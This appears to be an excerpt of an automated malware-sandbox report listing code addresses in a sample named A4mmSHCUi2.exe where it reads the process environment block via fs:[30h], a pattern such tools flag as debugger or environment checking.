Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C3E7E1 mov eax, dword ptr fs:[00000030h]	5_2_01C3E7E1
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BB47FB mov eax, dword ptr fs:[00000030h]	5_2_01BB47FB
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BB47FB mov eax, dword ptr fs:[00000030h]	5_2_01BB47FB
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C5678E mov eax, dword ptr fs:[00000030h]	5_2_01C5678E
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BD27ED mov eax, dword ptr fs:[00000030h]	5_2_01BD27ED
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BD27ED mov eax, dword ptr fs:[00000030h]	5_2_01BD27ED
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BD27ED mov eax, dword ptr fs:[00000030h]	5_2_01BD27ED
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C647A0 mov eax, dword ptr fs:[00000030h]	5_2_01C647A0
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BBC7C0 mov eax, dword ptr fs:[00000030h]	5_2_01BBC7C0
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BE273C mov eax, dword ptr fs:[00000030h]	5_2_01BE273C
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BE273C mov ecx, dword ptr fs:[00000030h]	5_2_01BE273C
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BE273C mov eax, dword ptr fs:[00000030h]	5_2_01BE273C
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C34755 mov eax, dword ptr fs:[00000030h]	5_2_01C34755
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BEC720 mov eax, dword ptr fs:[00000030h]	5_2_01BEC720
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BEC720 mov eax, dword ptr fs:[00000030h]	5_2_01BEC720
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C3E75D mov eax, dword ptr fs:[00000030h]	5_2_01C3E75D
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BB0710 mov eax, dword ptr fs:[00000030h]	5_2_01BB0710
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BE0710 mov eax, dword ptr fs:[00000030h]	5_2_01BE0710
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BEC700 mov eax, dword ptr fs:[00000030h]	5_2_01BEC700
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BB8770 mov eax, dword ptr fs:[00000030h]	5_2_01BB8770
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BC0770 mov eax, dword ptr fs:[00000030h]	5_2_01BC0770
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BC0770 mov eax, dword ptr fs:[00000030h]	5_2_01BC0770
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BC0770 mov eax, dword ptr fs:[00000030h]	5_2_01BC0770
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BC0770 mov eax, dword ptr fs:[00000030h]	5_2_01BC0770
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BC0770 mov eax, dword ptr fs:[00000030h]	5_2_01BC0770
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BC0770 mov eax, dword ptr fs:[00000030h]	5_2_01BC0770
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BC0770 mov eax, dword ptr fs:[00000030h]	5_2_01BC0770
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BC0770 mov eax, dword ptr fs:[00000030h]	5_2_01BC0770
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BC0770 mov eax, dword ptr fs:[00000030h]	5_2_01BC0770
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BC0770 mov eax, dword ptr fs:[00000030h]	5_2_01BC0770
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BC0770 mov eax, dword ptr fs:[00000030h]	5_2_01BC0770
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BC0770 mov eax, dword ptr fs:[00000030h]	5_2_01BC0770
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BB0750 mov eax, dword ptr fs:[00000030h]	5_2_01BB0750
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BF2750 mov eax, dword ptr fs:[00000030h]	5_2_01BF2750
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BF2750 mov eax, dword ptr fs:[00000030h]	5_2_01BF2750
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C2C730 mov eax, dword ptr fs:[00000030h]	5_2_01C2C730
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BE674D mov esi, dword ptr fs:[00000030h]	5_2_01BE674D
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BE674D mov eax, dword ptr fs:[00000030h]	5_2_01BE674D
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BE674D mov eax, dword ptr fs:[00000030h]	5_2_01BE674D
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BE66B0 mov eax, dword ptr fs:[00000030h]	5_2_01BE66B0
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BEC6A6 mov eax, dword ptr fs:[00000030h]	5_2_01BEC6A6
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BB4690 mov eax, dword ptr fs:[00000030h]	5_2_01BB4690
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BB4690 mov eax, dword ptr fs:[00000030h]	5_2_01BB4690
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C2E6F2 mov eax, dword ptr fs:[00000030h]	5_2_01C2E6F2
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C2E6F2 mov eax, dword ptr fs:[00000030h]	5_2_01C2E6F2
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C2E6F2 mov eax, dword ptr fs:[00000030h]	5_2_01C2E6F2
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C2E6F2 mov eax, dword ptr fs:[00000030h]	5_2_01C2E6F2
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C306F1 mov eax, dword ptr fs:[00000030h]	5_2_01C306F1
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C306F1 mov eax, dword ptr fs:[00000030h]	5_2_01C306F1
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BEA6C7 mov ebx, dword ptr fs:[00000030h]	5_2_01BEA6C7
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BEA6C7 mov eax, dword ptr fs:[00000030h]	5_2_01BEA6C7
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BB262C mov eax, dword ptr fs:[00000030h]	5_2_01BB262C
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BCE627 mov eax, dword ptr fs:[00000030h]	5_2_01BCE627
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BE6620 mov eax, dword ptr fs:[00000030h]	5_2_01BE6620
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BE8620 mov eax, dword ptr fs:[00000030h]	5_2_01BE8620
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BF2619 mov eax, dword ptr fs:[00000030h]	5_2_01BF2619
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C7866E mov eax, dword ptr fs:[00000030h]	5_2_01C7866E
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C7866E mov eax, dword ptr fs:[00000030h]	5_2_01C7866E
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BC260B mov eax, dword ptr fs:[00000030h]	5_2_01BC260B
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BC260B mov eax, dword ptr fs:[00000030h]	5_2_01BC260B
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BC260B mov eax, dword ptr fs:[00000030h]	5_2_01BC260B
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BC260B mov eax, dword ptr fs:[00000030h]	5_2_01BC260B
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BC260B mov eax, dword ptr fs:[00000030h]	5_2_01BC260B
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BC260B mov eax, dword ptr fs:[00000030h]	5_2_01BC260B
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BC260B mov eax, dword ptr fs:[00000030h]	5_2_01BC260B
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BE2674 mov eax, dword ptr fs:[00000030h]	5_2_01BE2674
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C2E609 mov eax, dword ptr fs:[00000030h]	5_2_01C2E609
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BEA660 mov eax, dword ptr fs:[00000030h]	5_2_01BEA660
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BEA660 mov eax, dword ptr fs:[00000030h]	5_2_01BEA660
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BCC640 mov eax, dword ptr fs:[00000030h]	5_2_01BCC640
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C469C0 mov eax, dword ptr fs:[00000030h]	5_2_01C469C0
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C7A9D3 mov eax, dword ptr fs:[00000030h]	5_2_01C7A9D3
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BB09AD mov eax, dword ptr fs:[00000030h]	5_2_01BB09AD
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BB09AD mov eax, dword ptr fs:[00000030h]	5_2_01BB09AD
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BC29A0 mov eax, dword ptr fs:[00000030h]	5_2_01BC29A0
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BC29A0 mov eax, dword ptr fs:[00000030h]	5_2_01BC29A0
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BC29A0 mov eax, dword ptr fs:[00000030h]	5_2_01BC29A0
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BC29A0 mov eax, dword ptr fs:[00000030h]	5_2_01BC29A0
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BC29A0 mov eax, dword ptr fs:[00000030h]	5_2_01BC29A0
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BC29A0 mov eax, dword ptr fs:[00000030h]	5_2_01BC29A0
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BC29A0 mov eax, dword ptr fs:[00000030h]	5_2_01BC29A0
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BC29A0 mov eax, dword ptr fs:[00000030h]	5_2_01BC29A0
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BC29A0 mov eax, dword ptr fs:[00000030h]	5_2_01BC29A0
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BC29A0 mov eax, dword ptr fs:[00000030h]	5_2_01BC29A0
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BC29A0 mov eax, dword ptr fs:[00000030h]	5_2_01BC29A0
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BC29A0 mov eax, dword ptr fs:[00000030h]	5_2_01BC29A0
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BC29A0 mov eax, dword ptr fs:[00000030h]	5_2_01BC29A0
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C3E9E0 mov eax, dword ptr fs:[00000030h]	5_2_01C3E9E0
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BE29F9 mov eax, dword ptr fs:[00000030h]	5_2_01BE29F9
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BE29F9 mov eax, dword ptr fs:[00000030h]	5_2_01BE29F9
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BBA9D0 mov eax, dword ptr fs:[00000030h]	5_2_01BBA9D0
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BBA9D0 mov eax, dword ptr fs:[00000030h]	5_2_01BBA9D0
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BBA9D0 mov eax, dword ptr fs:[00000030h]	5_2_01BBA9D0
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BBA9D0 mov eax, dword ptr fs:[00000030h]	5_2_01BBA9D0
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BBA9D0 mov eax, dword ptr fs:[00000030h]	5_2_01BBA9D0
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BBA9D0 mov eax, dword ptr fs:[00000030h]	5_2_01BBA9D0
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BE49D0 mov eax, dword ptr fs:[00000030h]	5_2_01BE49D0
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C389B3 mov esi, dword ptr fs:[00000030h]	5_2_01C389B3
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C389B3 mov eax, dword ptr fs:[00000030h]	5_2_01C389B3
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C389B3 mov eax, dword ptr fs:[00000030h]	5_2_01C389B3
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C30946 mov eax, dword ptr fs:[00000030h]	5_2_01C30946
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C84940 mov eax, dword ptr fs:[00000030h]	5_2_01C84940
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BA8918 mov eax, dword ptr fs:[00000030h]	5_2_01BA8918
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BA8918 mov eax, dword ptr fs:[00000030h]	5_2_01BA8918
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C54978 mov eax, dword ptr fs:[00000030h]	5_2_01C54978
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C54978 mov eax, dword ptr fs:[00000030h]	5_2_01C54978
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C3C97C mov eax, dword ptr fs:[00000030h]	5_2_01C3C97C
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C2E908 mov eax, dword ptr fs:[00000030h]	5_2_01C2E908
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C2E908 mov eax, dword ptr fs:[00000030h]	5_2_01C2E908
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BF096E mov eax, dword ptr fs:[00000030h]	5_2_01BF096E
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BF096E mov edx, dword ptr fs:[00000030h]	5_2_01BF096E
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BF096E mov eax, dword ptr fs:[00000030h]	5_2_01BF096E
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C3C912 mov eax, dword ptr fs:[00000030h]	5_2_01C3C912
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BD6962 mov eax, dword ptr fs:[00000030h]	5_2_01BD6962
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BD6962 mov eax, dword ptr fs:[00000030h]	5_2_01BD6962
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BD6962 mov eax, dword ptr fs:[00000030h]	5_2_01BD6962
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C3892A mov eax, dword ptr fs:[00000030h]	5_2_01C3892A
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C4892B mov eax, dword ptr fs:[00000030h]	5_2_01C4892B
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C808C0 mov eax, dword ptr fs:[00000030h]	5_2_01C808C0
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C7A8E4 mov eax, dword ptr fs:[00000030h]	5_2_01C7A8E4
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BB0887 mov eax, dword ptr fs:[00000030h]	5_2_01BB0887
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BEC8F9 mov eax, dword ptr fs:[00000030h]	5_2_01BEC8F9
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BEC8F9 mov eax, dword ptr fs:[00000030h]	5_2_01BEC8F9
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C3C89D mov eax, dword ptr fs:[00000030h]	5_2_01C3C89D
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BDE8C0 mov eax, dword ptr fs:[00000030h]	5_2_01BDE8C0
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BD2835 mov eax, dword ptr fs:[00000030h]	5_2_01BD2835
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BD2835 mov eax, dword ptr fs:[00000030h]	5_2_01BD2835
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BD2835 mov eax, dword ptr fs:[00000030h]	5_2_01BD2835
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BD2835 mov ecx, dword ptr fs:[00000030h]	5_2_01BD2835
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BD2835 mov eax, dword ptr fs:[00000030h]	5_2_01BD2835
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BD2835 mov eax, dword ptr fs:[00000030h]	5_2_01BD2835
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BEA830 mov eax, dword ptr fs:[00000030h]	5_2_01BEA830
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C3E872 mov eax, dword ptr fs:[00000030h]	5_2_01C3E872
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C3E872 mov eax, dword ptr fs:[00000030h]	5_2_01C3E872
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C46870 mov eax, dword ptr fs:[00000030h]	5_2_01C46870
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C46870 mov eax, dword ptr fs:[00000030h]	5_2_01C46870
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C3C810 mov eax, dword ptr fs:[00000030h]	5_2_01C3C810
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BB4859 mov eax, dword ptr fs:[00000030h]	5_2_01BB4859
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BB4859 mov eax, dword ptr fs:[00000030h]	5_2_01BB4859
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BE0854 mov eax, dword ptr fs:[00000030h]	5_2_01BE0854
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BC2840 mov ecx, dword ptr fs:[00000030h]	5_2_01BC2840
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C5483A mov eax, dword ptr fs:[00000030h]	5_2_01C5483A
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C5483A mov eax, dword ptr fs:[00000030h]	5_2_01C5483A
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BC0BBE mov eax, dword ptr fs:[00000030h]	5_2_01BC0BBE
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BC0BBE mov eax, dword ptr fs:[00000030h]	5_2_01BC0BBE
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C5EBD0 mov eax, dword ptr fs:[00000030h]	5_2_01C5EBD0
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C3CBF0 mov eax, dword ptr fs:[00000030h]	5_2_01C3CBF0
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BDEBFC mov eax, dword ptr fs:[00000030h]	5_2_01BDEBFC
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BB8BF0 mov eax, dword ptr fs:[00000030h]	5_2_01BB8BF0
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BB8BF0 mov eax, dword ptr fs:[00000030h]	5_2_01BB8BF0
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BB8BF0 mov eax, dword ptr fs:[00000030h]	5_2_01BB8BF0
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BD0BCB mov eax, dword ptr fs:[00000030h]	5_2_01BD0BCB
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BD0BCB mov eax, dword ptr fs:[00000030h]	5_2_01BD0BCB
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BD0BCB mov eax, dword ptr fs:[00000030h]	5_2_01BD0BCB
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BB0BCD mov eax, dword ptr fs:[00000030h]	5_2_01BB0BCD
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BB0BCD mov eax, dword ptr fs:[00000030h]	5_2_01BB0BCD
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BB0BCD mov eax, dword ptr fs:[00000030h]	5_2_01BB0BCD
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C64BB0 mov eax, dword ptr fs:[00000030h]	5_2_01C64BB0
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C64BB0 mov eax, dword ptr fs:[00000030h]	5_2_01C64BB0
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C46B40 mov eax, dword ptr fs:[00000030h]	5_2_01C46B40
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C46B40 mov eax, dword ptr fs:[00000030h]	5_2_01C46B40
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C7AB40 mov eax, dword ptr fs:[00000030h]	5_2_01C7AB40
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C58B42 mov eax, dword ptr fs:[00000030h]	5_2_01C58B42
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C64B4B mov eax, dword ptr fs:[00000030h]	5_2_01C64B4B
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C64B4B mov eax, dword ptr fs:[00000030h]	5_2_01C64B4B
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C5EB50 mov eax, dword ptr fs:[00000030h]	5_2_01C5EB50
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BDEB20 mov eax, dword ptr fs:[00000030h]	5_2_01BDEB20
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BDEB20 mov eax, dword ptr fs:[00000030h]	5_2_01BDEB20
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C82B57 mov eax, dword ptr fs:[00000030h]	5_2_01C82B57
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C82B57 mov eax, dword ptr fs:[00000030h]	5_2_01C82B57
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C82B57 mov eax, dword ptr fs:[00000030h]	5_2_01C82B57
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C82B57 mov eax, dword ptr fs:[00000030h]	5_2_01C82B57
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BACB7E mov eax, dword ptr fs:[00000030h]	5_2_01BACB7E
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C84B00 mov eax, dword ptr fs:[00000030h]	5_2_01C84B00
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C2EB1D mov eax, dword ptr fs:[00000030h]	5_2_01C2EB1D
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C2EB1D mov eax, dword ptr fs:[00000030h]	5_2_01C2EB1D
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C2EB1D mov eax, dword ptr fs:[00000030h]	5_2_01C2EB1D
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C2EB1D mov eax, dword ptr fs:[00000030h]	5_2_01C2EB1D
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C2EB1D mov eax, dword ptr fs:[00000030h]	5_2_01C2EB1D
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C2EB1D mov eax, dword ptr fs:[00000030h]	5_2_01C2EB1D
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C2EB1D mov eax, dword ptr fs:[00000030h]	5_2_01C2EB1D
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C2EB1D mov eax, dword ptr fs:[00000030h]	5_2_01C2EB1D
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C2EB1D mov eax, dword ptr fs:[00000030h]	5_2_01C2EB1D
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BA8B50 mov eax, dword ptr fs:[00000030h]	5_2_01BA8B50
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C78B28 mov eax, dword ptr fs:[00000030h]	5_2_01C78B28
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C78B28 mov eax, dword ptr fs:[00000030h]	5_2_01C78B28
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C06ACC mov eax, dword ptr fs:[00000030h]	5_2_01C06ACC
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C06ACC mov eax, dword ptr fs:[00000030h]	5_2_01C06ACC
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C06ACC mov eax, dword ptr fs:[00000030h]	5_2_01C06ACC
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BB8AA0 mov eax, dword ptr fs:[00000030h]	5_2_01BB8AA0
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BB8AA0 mov eax, dword ptr fs:[00000030h]	5_2_01BB8AA0
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BE8A90 mov edx, dword ptr fs:[00000030h]	5_2_01BE8A90
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BBEA80 mov eax, dword ptr fs:[00000030h]	5_2_01BBEA80
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BBEA80 mov eax, dword ptr fs:[00000030h]	5_2_01BBEA80
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BBEA80 mov eax, dword ptr fs:[00000030h]	5_2_01BBEA80
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BBEA80 mov eax, dword ptr fs:[00000030h]	5_2_01BBEA80
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BBEA80 mov eax, dword ptr fs:[00000030h]	5_2_01BBEA80
